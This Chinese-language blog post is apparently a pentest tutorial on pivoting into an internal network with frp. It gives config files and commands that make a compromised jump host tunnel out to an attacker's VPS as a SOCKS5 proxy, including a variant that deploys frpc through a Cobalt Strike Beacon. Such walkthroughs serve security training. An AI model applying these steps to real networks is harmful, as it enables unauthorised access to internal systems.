banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

利用frp进行内网代理

FRP 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议,且支持 P2P 通信。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。

frp 项目地址:https://github.com/fatedier/frp/blob/dev/README_zh.md

假如当前的网络拓朴如下,172.16.1.2 无法直接访问 10.1.1.2,需要通过 frp 代理访问。

frp vps 代理#

172.16.1.2 - <172.16.1.4,10.1.1.3 > 10.1.1.2

攻击者(172.16.1.2):

配置 frps.in 文件

image

配置文件如下:

frps.ini

[common]
bind_port = 7000
bind_addr = 0.0.0.0

受害者(跳板机:172.16.1.4)如下配置:

image

配置 frpc.ini,内容如下:

frpc.ini

[common]
server_addr = vpsip
server_port = 7000

[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5

设置完成后,先攻击者服务器开启监听

./frps -c frps.ini

image

受害者端执行

frpc.exe -c frpc.ini

浏览器设置代理访问

image

image

proxychains 配置代理远程登录

image

CS 配置 frp#

假如拓朴如下,和之前的操作其实一致。

172.16.1.3 - <172.16.1.4,10.1.1.4 > 10.1.1.3

用 CS 的 Beacon 运行 frpc 时,配置文件和程序都用绝对路径。利用文件上传 frpc.exe 和 frpc.ini 文件来进行代理。

image

配置文件如下

frps.ini

[common]
bind_port = 7000

frpc.ini

[common]
server_addr = 172.16.1.3
server_port = 7000

[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5

代理成功。

image

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。